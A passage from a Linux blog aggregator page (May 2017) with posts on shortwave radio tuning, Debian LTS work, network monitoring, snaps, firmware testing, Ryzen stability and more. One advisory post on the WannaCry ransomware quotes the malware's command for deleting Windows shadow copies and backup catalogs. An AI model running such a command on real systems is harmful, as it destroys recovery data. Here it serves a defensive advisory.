Turn the TRANSMITTER and ANTENNA knobs to the 12 o'clock position and leave them like that. Turn the INDUCTANCE knob while looking at the signals in the gqrx window. When you find the best position, the signal strength displayed on the screen will appear to increase (the animated white line should appear to move upwards and maybe some peaks will appear in the line).

When you feel you have found the best position for the INDUCTANCE knob, leave it in that position and begin turning the ANTENNA knob clockwise looking for any increase in signal strength on the chart. When you feel that is correct, begin turning the TRANSMITTER knob.

Listening to a transmission

At this point, if you are lucky, some transmissions may be visible on the gqrx screen. They will appear as darker colours in the waterfall chart. Try clicking on one of them, the vertical red line will jump to that position. For a USB transmission, try to place the vertical red line at the left hand side of the signal. Try dragging the vertical red line or changing the frequency value at the top of the screen by 100 Hz at a time until the station is tuned as well as possible.

Try and listen to the transmission and identify the station. Commercial shortwave broadcasts will usually identify themselves from time to time. Amateur transmissions will usually include a callsign spoken in the phonetic alphabet. For example, if you hear "CQ, this is Victor Kilo 3 Tango Quebec Romeo" then the station is VK3TQR. You may want to note down the callsign, time, frequency and mode in your log book. You may also find information about the callsign in a search engine.

The video demonstrates reception of a transmission from another country, can you identify the station's callsign and find his location?

If you have questions about this topic, please come and ask on the Debian Hams mailing list. The gqrx package is also available in Fedora and Ubuntu but it is known to crash on startup in Ubuntu 17.04. Users of other distributions may also want to try the Debian Ham Blend bootable ISO live image as a quick and easy way to get started.

16 May, 2017 06:34PM

Raphaël Hertzog: Freexian’s report about Debian Long Term Support, April 2017

A Debian LTS logoLike each month, here comes a report about the work of paid contributors to Debian LTS.

Individual reports

In April, about 190 work hours have been dispatched among 13 paid contributors. Their reports are available:

  • Antoine Beaupré did 19.5 hours (out of 16h allocated + 5.5 remaining hours, thus keeping 2 extra hours for May).
  • Ben Hutchings did 12 hours (out of 15h allocated, thus keeping 3 extra hours for May).
  • Brian May did 10 hours.
  • Chris Lamb did 18 hours.
  • Emilio Pozuelo Monfort did 17.5 hours (out of 16 hours allocated + 3.5 hours remaining, thus keeping 2 hours for May).
  • Guido Günther did 12 hours (out of 8 hours allocated + 4 hours remaining).
  • Hugo Lefeuvre did 15.5 hours (out of 6 hours allocated + 9.5 hours remaining).
  • Jonas Meurer did nothing (out of 4 hours allocated + 3.5 hours remaining, thus keeping 7.5 hours for May).
  • Markus Koschany did 23.75 hours.
  • Ola Lundqvist did 14 hours (out of 20h allocated, thus keeping 6 extra hours for May).
  • Raphaël Hertzog did 11.25 hours (out of 10 hours allocated + 1.25 hours remaining).
  • Roberto C. Sanchez did 16.5 hours (out of 20 hours allocated + 1 hour remaining, thus keeping 4.5 extra hours for May).
  • Thorsten Alteholz did 23.75 hours.

Evolution of the situation

The number of sponsored hours decreased slightly and we’re now again a little behind our objective.

The security tracker currently lists 54 packages with a known CVE and the dla-needed.txt file 37. The number of open issues is comparable to last month.

Thanks to our sponsors

New sponsors are in bold.

No comment | Liked this article? Click here. | My blog is Flattr-enabled.

16 May, 2017 03:52PM

Cumulus Linux

Data center network monitoring best practices part 3: Modernizing tooling

Implementing your strategy using modern tooling

In the previous two posts we discussed gathering metrics for long term trend analysis and then combining it with event-based alerts for actionable results. In order to combine these two elements, we need strong network monitoring tooling that allows us to overlay these activities into an effective solution.

Understanding drawbacks of older network monitoring tooling

The legacy approach to monitoring is to deploy a monitoring server that periodically polls your network devices via Simple Network Management Protocol. SNMP is a very old protocol, originally developed in 1988. While some things do get better with age, computer protocols are rarely one of them. SNMP has been showing its age in many ways.


SNMP uses data structures called MIBs to exchange information. These MIBs are often proprietary, and difficult to modify and extend to cover new and interesting metrics.

Polling vs event driven

Polling doesn’t offer enough granularity to catch all events. For instance, even if you check disk utilization once every five minutes, you may go over threshold and back in between intervals and never know.

An inefficient protocol

SNMP’s polling design is a “call and response” protocol, this means the monitoring server will send a request to the network device for one or more metrics and the network device will respond with the requested information. The downside of this is that CPU cycles are expended to receive the request, process it and send a response back to the monitoring server. When the CPU is very busy, requests may have to be queued until the CPU can service them. And since they’re requested over UDP by default, if they get dropped or the queue is full, the monitoring server needs to send a whole new request — which just consumes more CPU.

Imagine for a moment that multiple monitoring servers are polling each node and this process is fully repeated for each monitoring server. You could have 10 monitoring servers polling each network device with network admins afraid to restrict access because they don’t want to risk the consequences of impacting another team’s network monitoring tooling. It is easy to see that this core behavior is a recipe for disaster at larger scales.

Next generation monitoring is agent based

Of course, Cumulus Networks supports SNMP, but today there are better approaches. Newer techniques for monitoring ditch the older “call and response” approach in favor of something called streaming telemetry. In this approach, an agent runs on the switch and periodically sends metrics of interest directly to a database, typically a newer time-series database. From there, the data in the database can be analyzed, alerts can be triggered if thresholds are crossed, remediation actions can be taken for failures and ultimately, the data can be displayed in a dashboard.

Monitoring agents also overcome a challenge that is native to SNMP polling which is state retention. SNMP has no contextual understanding of state. It has no idea what the output of the previous poll request was. Since a monitoring agent is its own autonomous entity, it can be configured to store that data (either on box or in memory) to make smarter analysis and response than SNMP. Also, it doesn’t have to always send data when polled, so it can help save CPU on the sender and only send relevant data. This normally is done through a user configured script.

Flexibility and choice in network monitoring tooling 

There are a lot of monitoring agents out there, and they interact with Cumulus Linux in their own unique ways. Some of them have many built-in plugins that have access to metrics native to Cumulus Linux, while others make it easy to create custom scripts.

In working with customers that are implementing this paradigm of monitoring, we found operational efficiencies by using the same agents that have been deployed on servers. Since Cumulus Linux works with any Linux agent, we’ve seen a reduction in the need for unique independent solutions per vendor.

Customizable metrics 

Agents can be configured to send all different kinds of data, meaning metrics can be infinitely customizable based on the needs of the organization. With agent-based monitoring on a fully functional Linux platform like Cumulus Linux, you can write a script to make truly anything a metric. You have the ability to do some additional processing on the switch to produce metrics that correlate multiple items, making them more intelligent, useful and actionable.

Because metrics are sent directly to the monitoring server without having to process the request for the data, and because you can send metrics all at once instead of collecting them individually for each destination when sending to multiple databases, CPU resources are used as efficiently as possible. You can also aggregate metrics from multiple sources. Syslog messages can be sent alongside other custom metrics to create a database, which provides a more holistic view of the network and provides significant advantages for event correlation and alerting.

Next steps in your data center network monitoring

If you’re looking for a starting point on you monitoring journey to network nirvana, check out our Monitoring Project on Github. It is a homegrown solution example that is built using agent-based techniques — Telegraf runs on switches to send metrics to an InfluxDB time-series database, which is ultimately displayed in a Grafana dashboard frontend. The Monitoring Project can be extended to monitor anything you like and is available free of charge.

Cumulus Networks is also working on a solution to help you get better visibility and intelligence in the management of your network. Keep an eye out for more on the general availability of that solution soon!

Finally, join our Slack if you have any questions about network monitoring tooling or need help extending the solution for your environment. Or reach out to our professional services team for additional help designing your ideal monitoring environment, we’re always happy to help!

We look forward to hearing from you!

The post Data center network monitoring best practices part 3: Modernizing tooling appeared first on Cumulus Networks Blog.

16 May, 2017 03:04PM by Eric Pulvino

hackergotchi for Ubuntu developers

Ubuntu developers

Ubuntu Insights: DataArt release new version of Alexa Virtual Device for Raspberry Pi

This is a guest post by DataArt. If you would like to contribute a guest post, please contact

This project aims to provide the ability to bring Alexa to any Linux device including embedded systems like Raspberry Pi or DragonBoard boards. The binary release is packed into a snap package, which is a perfect way to deliver this project.

Short instructions to run it with snap:
You need to create your own Alexa Device on the Amazon developer portal. Follow this manual to create your own device and security profile –
Add http://alexa.local:3000/authresponse to the Allowed Return URLs and http://alexa.local:3000 to the Allowed Origins.
Connect an audio device: a microphone and speakers to your device. It could be a USB headset for example.
Install the PulseAudio snap:

sudo snap install --devmode pulseaudio

Install the Alexa snap from the store:

sudo snap install --channel beta alexa

Open http://alexa.local:3000 in a web browser on a local device or a device on the same network. Note: the app provides an mDNS advertisement of the local domain alexa.local. This is very helpful for using with monitorless devices.

Fill in the device credentials that were created during step 1, click ‘log in’. Note: the voice detection threshold is a float value for adjusting voice detection. The smaller the value, the easier it is to trigger. You may need to adjust it for your mic and voice.

Fill in your amazon credentials.

Now you can speak with Alexa. The app uses voice activation. Say ‘Alexa’ and the phrase that you want to say to her. The app makes a beep via in speakers when it hears the ‘Alexa’ keyword and starts recording.

Enjoy Alexa without the need to buy special hardware 🙂

16 May, 2017 03:00PM

The Fridge: Ubuntu Weekly Newsletter Issue 507

Welcome to the Ubuntu Weekly Newsletter. This is issue #507 for the weeks May 1-15, 2017, and the full version is available here.

In this issue we cover:

The issue of The Ubuntu Weekly Newsletter is brought to you by:

  • Simon Quigley
  • Chris Guiver
  • Nathan Handler
  • Jose Antonio Rey
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

Except where otherwise noted, content in this issue is licensed under a Creative Commons Attribution 3.0 License BY SA Creative Commons License

16 May, 2017 04:20AM

May 15, 2017

Colin King: Firmware Test Suite Text Based Front-End

The Firmware Test Suite (FWTS) has an easy to use text based front-end that is primarily used by the FWTS Live-CD image but it can also be used in the Ubuntu terminal.

To install and run the front-end use:

 sudo apt-get install fwts-frontend  
sudo fwts-frontend-text

..and one should see a menu of options:

In this demonstration, the "All Batch Tests" option has been selected:

Tests will be run one by one and a progress bar shows the progress of each test. Some tests run very quickly, others can take several minutes depending on the hardware configuration (such as number of processors).

Once the tests are all complete, the following dialogue box is displayed:

The test has saved several files into the directory /fwts/15052017/1748/ and selecting Yes one can view the results log in a scroll-box:

Exiting this, the FWTS frontend dialog is displayed:

Press enter to exit (note that the Poweroff option is just for the fwts Live-CD image version of fwts-frontend).

The tool dumps various logs, for example, the above run generated:

 ls -alt /fwts/15052017/1748/  
total 1388
drwxr-xr-x 5 root root 4096 May 15 18:09 ..
drwxr-xr-x 2 root root 4096 May 15 17:49 .
-rw-r--r-- 1 root root 358666 May 15 17:49 acpidump.log
-rw-r--r-- 1 root root 3808 May 15 17:49 cpuinfo.log
-rw-r--r-- 1 root root 22238 May 15 17:49 lspci.log
-rw-r--r-- 1 root root 19136 May 15 17:49 dmidecode.log
-rw-r--r-- 1 root root 79323 May 15 17:49 dmesg.log
-rw-r--r-- 1 root root 311 May 15 17:49 README.txt
-rw-r--r-- 1 root root 631370 May 15 17:49 results.html
-rw-r--r-- 1 root root 281371 May 15 17:49 results.log

acpidump.log is a dump of the ACPI tables in format compatible with the ACPICA acpidump tool.  The results.log file is a copy of the results generated by FWTS and results.html is a HTML formatted version of the log.

15 May, 2017 05:27PM by Colin Ian King (

Bryan Quigley: Who we trust | Building a computer

I thought I was being smart.  By not buying through AVADirect I wasn’t going to be using an insecure site to purchase my new computer.

For the curious I ended purchasing through eBay (A rating) and Newegg (A rating) a new Ryzen (very nice chip!) based machine that I assembled myself.   Computer is working mostly ok, but has some stability issues.   A Bios update comes out on the MSI website promising some stability fixes so I decide to apply it.

The page that links to the download is HTTPS, but the actual download itself is not.
I flash the BIOS and now appear to have a brick.

As part of troubleshooting I find that the MSI website has bad HTTPS security, the worst page being:

Given the poor security and now wanting a motherboard with a more reliable BIOS  (currently I need to send the board back at my expense for an RMA) I looked at other Micro ATX motherboards starting with a Gigabyte which has even less pages using any HTTPS and the ones that do are even worse:

Unfortunately a survey of motherboard vendors indicates MSI failing with Fs might put them in second place.   Most just have everything in the clear, including passwords.   ASUS clearly leads the pack, but no one protects the actual firmware/drivers you download from them.

Main Website Support Site RMA Process Forum Download Site Actual Download
MSI F F F F F Plain Text
AsRock Plain text Email Email Plain text Plain Text Plain Text
Gigabyte (login site is F) Plain text Plain Text Plain Text Plain text Plain Text Plain Text
EVGA Plain text default/A- Plain text Plain text A Plain Text Plain Text
ASUS A- A- B Plain text default/A A- Plain Text
BIOSTAR Plain text Plain text Plain text n/a? Plain Text Plain Text

A quick glance indicates that vendors that make full systems use more security (ASUS and MSI being examples of system builders).

We rely on the security of these vendors for most self-built PCs.  We should demand HTTPS by default across the board.   It’s 2017 and a BIOS file is 8MB, cost hasn’t been a factor for years.

15 May, 2017 03:46PM

Bryan Quigley: Ryzen so far…

So my first iteration ended in a failed BIOS update…  Now I have a fresh MB.

Iteration 2 – disable everything

Ryzen machine is running pretty stable now with a few tweaks.   I was getting some memory paging bugs but one of things worked around it:

  • Moved from 4.10 (stock zesty) to 4.11 mainline kernel
  • Remove 1 of my 2 16 GB sticks of memory
  • Underclock memory from 2400 -> 2133
  • Re-enable VM Support (CVM)
  • Disable the C6
  • Disable boost

It was totally stable for several days after that..

Iteration 3 – BIOS update

Trying to have less things disabled (or more specifically to get my full 32 GB of ram) I did the latest (7A37v14) BIOS update (with all cables not important for the update removed).

Memtest had also intermittently shown bad ram… but I can no longer reproduce…  Both sticks tested independently show nothing is wrong..  Then I put both back in and it says it’s fine.

Part of that was resetting the settings above and although it was more stable I was still getting random crashes.

Iteration 4 – Mostly just underclock the RAM

  • Underclocked 32 GB of  memory from 2400 -> 2133
  • On 4.11 kernel mainline kernel with Nouveau drivers (previously on Nvidia prop. driver, but didn’t support 4.11 at the time)

So far it’s been stable and that’s what I’m running.

Outstanding things

  • CPU Temperature Reporting on Linux is Missing.  (AMD has to release the data to do so – see some discussion here.  That is a community project, posting there will not help AMD do anything)
  • Being coreboot friendly with these new chips
  • Update BIOS from Linux?
  • Why is VM support disabled by default? (It’s called SVM on these boards)
  • MSI please document/implement BIOS recover for these motherboards


Ryzen 1700 is a pretty powerful chip.  I love having 16 threads available to me (VMs/Compiling faster is what I wanted from ryzen and it delivers)   Like many new products there are some stumbling blocks for earlier adopters, but I feel like on my hardware combinations+ I’m finally seeing the stability I need.

*Stability testing was just leaving BOINC running (with SETI and NFS projects) with Firefox open.  And doing normal work with VMs, etc.
Ryzen 1700
2 x Patriot 16GB DDR4-2400  PSD416G24002H

15 May, 2017 03:45PM

hackergotchi for Wazo


Sprint Review 17.07

Hello Wazo community! Here comes the release of Wazo 17.07!

New features in this sprint

Admin UI: The new web interface based on our REST API is now available for preview. See Wazo admin UI

Admin UI: IVR can now be managed from the admin UI

Admin UI: CDR can now be listed and searched from the admin UI instead of downloading a CSV from the old web interface.

Admin UI: Conference rooms using Asterisk confbridge can be managed using the admin UI

Admin UI: Parkings using Asterisk parking lots can be managed using the admin UI

Admin UI: Plugins can be managed from the admin UI

REST API: We have added a new REST API to manage wazo plugins using wazo-plugind. This new API is used by the administration UI to install and enable features.

REST API: CDR can now be queried by user to get its own call logs.

Ongoing features

Call logs: We are attaching more data to the call logs and generating new views to have a summary for a given query instead of a list of call logs.

Admin UI: We are working to improve the new web interface.

Plugin management: There is still a lot to be done to the plugin management service. e.g. dependency, upgrade, wazo version constraint, HA, ..

The instructions for installing Wazo or upgrading Wazo are available in the documentation.

For more details about the aforementioned topics, please see the roadmap linked below.

See you at the next sprint review!


15 May, 2017 04:00AM by The Wazo Authors

May 14, 2017

hackergotchi for Ubuntu developers

Ubuntu developers

Aaron Honeycutt: LFNW 2017!

LinuxFest NorthWest was a fantastic time for me, our Ubuntu booth had Valorie (Kubuntu), Simon (Kubuntu/Lubuntu) and over at the Jupiter Broadcasting we had the awesome Martin Wimpress (Ubuntu Mate). One top question was “what about that Unity news” which we gave a clear answer about Unity development ending and the move to GNOME. Since we were also burning DVD’s and dding usb drives we would recommend that users try out GNOME Shell if GNOME was their preferred Desktop.





We had plenty of bonding experience as part of the Kubuntu team, both forming new memories together and reliving others times at previous conferences. Since I had brought the lovely Card Against Humanity and the System 76 folks had a just great BBQ at their hotel the first night we took full advantage of the deck.





While he had our fun we did have work done like some work on our Installer Slideshow, and 2(two) Pull Requests from Simon for the Kubuntu Manual. One was to fix a lot of warnings that would happen when you run any of the ‘make’ commands and other was enabling Travis CI support! So now every time that we push anything to our github it runs ‘make html/epub/latexpdf’ automatically.

The ever amazing Ubuntu Community helped this happen so please do donate if you have a few extra dollars to help send more people to conferences to work together in person. These in person meetings help our teams bond and work even better together.


14 May, 2017 05:14PM

Kubuntu General News: Plasma bugfix releases, Frameworks, & selected app updates now available in backports PPA for Zesty and Xenial

Plasma Desktop 5.9.5 for Zesty 17.04, 5.8.6 for Xenial 16.04,  KDE Frameworks 5.33 and some selected application updates are now available via the Kubuntu backports PPA.

The updates include:

Kubuntu 17.04 – Zesty Zapus.

  • Plasma 5.9.5 bugfix release
  • KDE Frameworks 5.33
  • Digikam 5.5.5
  • Krita 3.1.3
  • Konversation 1.7.2
  • Krusader 2.6
  • Yakuake 3.0.4
  • Labplot 2.4

Kubuntu 16.04 – Xenial Xerus

  • Plasma 5.8.6 bugfix release
  • KDE Frameworks 5.33
  • Krita 3.1.3

We hope that the additional application updates for 17.04 above will soon be available for 16.04.

To update, use the Software Repository Guide to add the following repository to your software sources list:


or if already added, the updates should become available via your preferred updating method.

Instructions on how to manage PPA and more info about the Kubuntu PPAs can be found in the Repositories Documentation

The PPA can be added manually in the Konsole terminal with the command:

sudo add-apt-repository ppa:kubuntu-ppa/backports

and packages then updated with

sudo apt-get update
sudo apt-get dist-upgrade

14 May, 2017 09:36AM

May 13, 2017

Arthur Schiwon: Bookmarks for Nextcloud 0.10.0 released

<a href="">"bookmarks" by Audrey B., CC BY 2.0</a>

I am happy to announce the availability of Bookmarks for Nextcloud 0.10.0! Bookmarks is a simple way to manage the remarkable websites and pages you come across on the Internet. Bookmarks 0.10.0 provides API methods to create, read, update and delete your bookmarks as well as compatibility with upcoming Nextcloud 12, next to smaller improvements and fixes.

Bookmarks 0.10 is available at the Nextcloud App Store and thus of course from your Nextcloud app management. Since this release Bookmarks is not officially supporting ownCloud anymore.

Personally I had hoped to release sooner, and if it was not for Marcel Klehr it would have been terribly later. He added the API methods, did a lot of code consolidation, migrated away from the deprecated database interface, and while doing so fixed the annoying tag rename bug. Kudos for his great efforts! Apart of him, I would also like to thank adsworth, brantje, Henni and LukasReschke for their contributions in this release!

Developers interested in the API can check out the documentation at the README file of our project, which was also written by Marcel.

Eventually, there will be the next, annual Nextcloud Conference in Berlin. This will take part from Aug 22nd to Aug 29th, and the Call for Papers is still open. Any sort of (potential) contributor is warmly welcome!

13 May, 2017 09:49PM

hackergotchi for ARMBIAN


Orange Pi Zero 2+ H5

Ubuntu server – mainline kernel
  .torrent (recommended) ?
Command line interface – server usage scenarios.


Ubuntu server – mainline kernel
Command line interface – server usage scenarios.


other download options and archive

Known issues

All currently available OS images for H5 boards are experimental

  • don’t use them for anything productive but just to give constructive feedback to developers
  • shutdown might result in reboots instead or board doesn’t really power off (cut power physically)


Quick start | Documentation


Make sure you have a good & reliable SD card and a proper power supply. Archives can be uncompressed with 7-Zip on Windows, Keka on OS X and 7z on Linux (apt-get install p7zip-full). RAW images can be written with Etcher (all OS).


Insert SD card into a slot and power the board. (First) boot (with DHCP) takes up to 35 seconds with a class 10 SD Card and cheapest board.


Login as root on HDMI / serial console or via SSH and use password 1234. You will be prompted to change this password at first login. Next you will be asked to create a normal user account that is sudo enabled (beware of default QWERTY keyboard settings at this stage).

13 May, 2017 05:40PM by igorpecovnik

hackergotchi for Ubuntu developers

Ubuntu developers

David Tomaschik: Applied Physical Attacks and Hardware Pentesting

This week, I had the opportunity to take Joe Fitzpatrick’s class “Applied Physical Attacks and Hardware Pentesting”. This was a preview of the course he’s offering at Black Hat this summer, and so it was in a bit of an unpolished state, but I actually enjoyed the fact that it was that way. I’ve taken a class with Joe before, back when he and Stephen Ridley of Xipiter taught “Software Exploitation via Hardware Exploitation”, and I’ve watched a number of his talks at various conferences, so I had high expectations of the course, and he didn’t disappoint.

Some basic knowledge of hardware & hardware pentesting is assumed. While you don’t need to be an electrical engineer (I’m not!) being familiar with how digital signals work (i.e., differential signals or signals referenced to a ground) is useful, and you should have some experience with at least connecting a UART to a device. If you don’t have any of this experience, I suggest taking his course “Applied Physical Attacks on Embedded Systems” before taking this class. (Which is the same recommendation Joe gives.)

During the course, a variety of topics are covered, including:

  • Identifying unknown chips (manufacturers sometimes grind the markings off chips or cover them in epoxy)
  • Identifying unknown protocols (what is a device speaking?)
  • “Speaking” custom protocols in hardware
  • Finding JTAG connections when they’re obvious – or not
  • Using JTAG on devices with unknown processors (i.e., no datasheet available)
  • Building custom hardware implants to carry out attacks
  • Assessing & articulating feasibility and costs of hardware risks

While more introductory courses typically point you at a COTS SOHO router or similar device as a target, this course uses two targets: one of them custom and one of them uses an unknown microcontroller. These are much more representative of product assessments or red teams as you’ll often be faced with new or undocumented targets, and so the lab exercises here translate well into these environments.

Joe really knows his stuff, and that much is obvious when you watch videos of him speaking or take any of his classes. He answered questions thoroughly and engaged the class in thoughtful discussion. There were “pen and paper” exercises where he encouraged the class to work in small groups and then we discussed the results, and it was interesting to see differing backgrounds approach the problem in different ways.

One of the mixed blessings of taking his “preview” course was that some of the labs did not go perfectly as planned. I call this a mixed blessing becase, although it made the labs take a little longer, I actually feel I learned more by debugging and by Joe’s responses to the parts that weren’t working correctly. It’s imporant to know that hardware hacking doesn’t always go smoothly, and this lesson was evident in the labs. Joe helped us work around each of the issues, and generally tried to explain what was causing the problems at each stage.

I learned a lot about looking at systems that have no documentation available and finding their flaws and shortcomings. Given the ever-increasing “Internet of Things” deployments, this kind of skillset will only become ever more useful to security practitioners, and Joe is an excellent instructor for the material.

13 May, 2017 07:00AM

May 12, 2017

Mathieu Trudel: If you're still using ifconfig, you're living in the past

The world evolves

I regularly see "recommendations" to use ifconfig to get interface information in mailing list posts or bug reports and other places. I might even be guilty of it myself. Still, the world of networking has evolved quite a lot since ifconfig was the de-facto standard to bring up a device, check its IP or set an IP.

Following some improvements in the kernel and the gradual move to driving network things via netlink; ifconfig has been largely replaced by the ip command.

Running just ip yields the following:

Usage: ip [ OPTIONS ] OBJECT { COMMAND | help }
       ip [ -force ] -batch filename
where  OBJECT := { link | address | addrlabel | route | rule | neigh | ntable |
                   tunnel | tuntap | maddress | mroute | mrule | monitor | xfrm |
                   netns | l2tp | fou | macsec | tcp_metrics | token | netconf | ila }
       OPTIONS := { -V[ersion] | -s[tatistics] | -d[etails] | -r[esolve] |
                    -h[uman-readable] | -iec |
                    -f[amily] { inet | inet6 | ipx | dnet | mpls | bridge | link } |
                    -4 | -6 | -I | -D | -B | -0 |
                    -l[oops] { maximum-addr-flush-attempts } | -br[ief] |
                    -o[neline] | -t[imestamp] | -ts[hort] | -b[atch] [filename] |
                    -rc[vbuf] [size] | -n[etns] name | -a[ll] | -c[olor]}

I understand this may look complicated to some people, but the jist of it is to understand that with ip, you interact with objects, and apply some kind of function to it. For example:

ip address show

This is the main command that would be used in place of ifconfig. It will just display the IP addresses assigned to all interfaces. To be precise, it will show you the layer 3 details the interface: the IPv4 and IPv6 addresses, whether it is up, what are the different properties related to the addresses...

Another command will give you details about the layer 2 properties of the interface: its MAC address (ethernet address), etc; even if it is shown by ip address:

ip link show

Furthermore, you can set devices up or down (similar to ifconfig eth0 up or ifconfig eth0 down) simply by using:

ip link set DEVICE up or ip link set DEVICE down

As shown above, there are lots of other objects that can be interacted with using the ip command. I'll cover another: ip route, in another post.

Why is this important?

As time passes, more and more features are becoming easier to use with the ip command instead of with ifconfig. We've already stopped installing ifconfig on desktops (it still gets installed on servers for now), and people have been discussing dropping net-tools (the package that ships ifconfig and a few other old commands that are replaced) for a while now. It may be time to revisit not installing net-tools by default anywhere.

I want to know about your world

Are you still using one of the following tools?

/bin/netstat    (replaced by ss, for which I'll dedicate another blog post entirely)
/sbin/ipmaddr   (replaced by ip maddress)
/sbin/mii-tool    (ethtool should appropriately replace it)

If so and there is just no alternative to using them that comes from iproute2 (well, the ip or ss commands) that you can use to do the same, I want to know about how you are using them. We're always watching for things that might be broken by changes; we want to avoid breaking things when possible.

12 May, 2017 08:05PM by Mathieu Trudel-Lapierre (

hackergotchi for Whonix


2nd Patreon Stream Now Public – Let’s talk Quantum

I’ve just wrapped up the second monthly Patreon Live Stream, this time sadly without Patrick, due to an error on my part.

This time I covered quantum computing, its threats for current encryption and verification standards and what it is going to mean for the future.

You may watch it now here:


If you would like to join us next time or you feel like supporting Whonix, please consider donating to our Patreon:

The post 2nd Patreon Stream Now Public – Let’s talk Quantum appeared first on Whonix.

12 May, 2017 07:20PM by Ego

hackergotchi for AlienVault OSSIM

AlienVault OSSIM

Ongoing WannaCry Ransomware Spreading Through SMB Vulnerability

As of early this morning (May 12th, 2017), the AlienVault Labs team is seeing reports of a wave of infections using a ransomware variant called “WannaCry” that is being spread by a worm component that leverages a Windows-based vulnerability.

There have been reports of large telecommunication companies, banks and hospitals being affected. Tens of thousands of networks worldwide have been hit and the attacks do not appear to be targeted to any specific region or industry. Once infected, victims are asked to pay approximately $300 by Bitcoin, and it appears the attackers have found people willing to pay.

The AlienVault Labs team has created a Pulse in the Open Threat Exchange to share the indicators of compromise we have been able to obtain. These indicators can be used to help identify potential attacks in progress.

One method of command and control and secondary installation has been sinkholed by security researchers, however the attackers can still leverage a second communication mechanism via Tor.

The WannaCry ransomware is using the file extension .wncry, and it also deletes the Shadow Copies, which is a technology introduced into the Microsoft platforms as far back as Windows XP and Windows Vista as the Volume Shadow Copy service. This means that even backup copies produced by this service, such as Windows Backup and System Restore, would be affected as well.

cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet (PID: 2292)

The following file is also created in the affected systems: @Please_Read_Me@.txt

Once it gets on a network, WannaCry exploits a known Microsoft Windows vulnerability (MS17-010) to spread. This vulnerability was released as part of the Shadow Brokers leaks back in April. Microsoft released a patch for MS17-010 on March 14th. Administrators are advised to immediately upgrade any systems that do not have this patch to avoid potential compromise by WannaCry. So far the only confirmed vector of the attacks is through an SMB exploit, which provides a worm-like mechanism of spreading WannaCrypt.

AlienVault USM Anywhere and USM Appliance are able to detect attempts to exploit this vulnerability via the following IDS signature released by AlienVault on April 18th:

ET EXPLOIT Possible ETERNALBLUE MS17-010 Echo Response

Yesterday we noted a sharp increase in external scans against our customers for the exploit, and we are investigating if it is related to today's attacks:

We will update this blog post as we discover more information about the ongoing situation.

12 May, 2017 05:58PM

hackergotchi for Ubuntu developers

Ubuntu developers

Adam Stokes: conjure-up dev summary for week 19

conjure-up dev summary for week 19

conjure-up dev summary for week 19 conjure-up dev summary for week 19 conjure-up dev summary for week 19

This week contains a significant change for how we do Localhost deployments and a lot more polishing around the cloud selection experience.

Localhost Deployments

Over the last couple of months we've been monitoring our issues, statistics, message boards and came to the conclusion that it may be time to take further control over the technologies conjure-up requires to work.

Currently, we bundle Juju into our snap and that gives us the ability to validate, test, and lock in to a version we are comfortable with shipping to the masses. However, with LXD we took the approach of using what was already installed on the user's system or making sure to upgrade to the latest LXD that is known to work with conjure-up at the time of release. The problem with doing it this way is there may be times where the LXD version gets upgraded before we push out a new release which then leaves the big question of will conjure-up continue to work as expected? Most cases, the answer is yes, however, there have been times when some form of API change is introduced that may cause breakage. Fortunately for us, we haven't seen this problem come up in a long time, however, the potential for future problems is still there.

So how do we solve this issue? We sent out a proposal outlining why we wanted to go with a particular solution and made sure to solicit input from the community to either get approval or see if there were any other solutions. Read about that proposal and responses for more details into that process and the pros and cons. The conclusion was to go with our proposal and bundle LXD into conjure-up snap in the same way we do Juju.

This work has been completed and should make it's way into conjure-up 2.2. Prior to that though we need to make sure to socialize this change as it will cause users existing Localhost deployment to not be easily reachable and also documenting how users can reach their newly deployed containers.


There has been significant work put in to improve the user experience and to gently warn them when their inputs are incorrect. We modeled the validation framework similar to what you see in a normal webpage submission form and also extending on that idea to make a best effort to automatically fix their inputs on the fly.

For example, with MAAS deployments conjure-up requires a server address and api key. If the user inputs just the IP address (ie we will automatically format that to the correct API endpoint (ie

conjure-up dev summary for week 19

After Validation:
conjure-up dev summary for week 19

That's all for now, remember to check back next week for more conjure-up goodness!

12 May, 2017 01:32PM

Daniel Pocock: Thank you to the OSCAL team

The welcome gift deserves its own blog post. If you want to know what is inside, I hope to see you at OSCAL'17.

12 May, 2017 01:26PM

Daniel Pocock: Kamailio World and FSFE team visit, Tirana arrival

This week I've been thrilled to be in Berlin for Kamailio World 2017, one of the highlights of the SIP, VoIP and telephony enthusiast's calendar. It is an event that reaches far beyond Kamailio and is well attended by leaders of many of the well known free software projects in this space.

HOMER 6 is coming

Alexandr Dubovikov gave me a sneak peek of the new version of the HOMER SIP capture framework for gathering, storing and analyzing messages in a SIP network.

exploring HOMER 6 with Alexandr Dubovikov at Kamailio World 2017

Visiting the FSFE team in Berlin

Having recently joined the FSFE's General Assembly as the fellowship representative, I've been keen to get to know more about the organization. My visit to the FSFE office involved a wide-ranging discussion with Erik Albers about the fellowship program and FSFE in general.

discussing the Fellowship program with Erik Albers

Steak and SDR night

After a hard day of SIP hacking and a long afternoon at Kamailio World's open bar, a developer needs a decent meal and something previously unseen to hack on. A group of us settled at Escados, Alexanderplatz where my SDR kit emerged from my bag and other Debian users found out how easy it is to apt install the packages, attach the dongle and explore the radio spectrum.

playing with SDR after dinner

Next stop OSCAL'17, Tirana

Having left Berlin, I'm now in Tirana, Albania where I'll give an SDR workshop and Free-RTC talk at OSCAL'17. The weather forecast is between 26 - 28 degrees celsius, the food is great and the weekend's schedule is full of interesting talks and workshops. The organizing team have already made me feel very welcome here, meeting me at the airport and leaving a very generous basket of gifts in my hotel room. OSCAL has emerged as a significant annual event in the free software world and if it's too late for you to come this year, don't miss it in 2018.

OSCAL'17 banner

12 May, 2017 09:48AM

May 11, 2017

hackergotchi for SparkyLinux



A new application landed in Sparky repos: Dooble.

Dooble is a secure, open source, WebKit based web browser that provides solid performance, stability, and cross-platform functionality.

From Wikipedia:

Dooble was created to improve privacy. Currently, Dooble is available for FreeBSD, Linux, OS X, OS/2, and Windows. Dooble uses Qt for its user interface and abstraction from the operating system and processor architecture. As a result, Dooble should be portable to any system that supports OpenSSL, POSIX threads, Qt, SQLite, and other libraries.

sudo apt update
sudo apt install dooble


If Dooble will not start, try to launch it in a terminal emulator via the command:
and paste an output on ours forums, please.


11 May, 2017 10:58PM by pavroo

hackergotchi for Maemo developers

Maemo developers

How do they do it? Asynchronous undo and redo editors

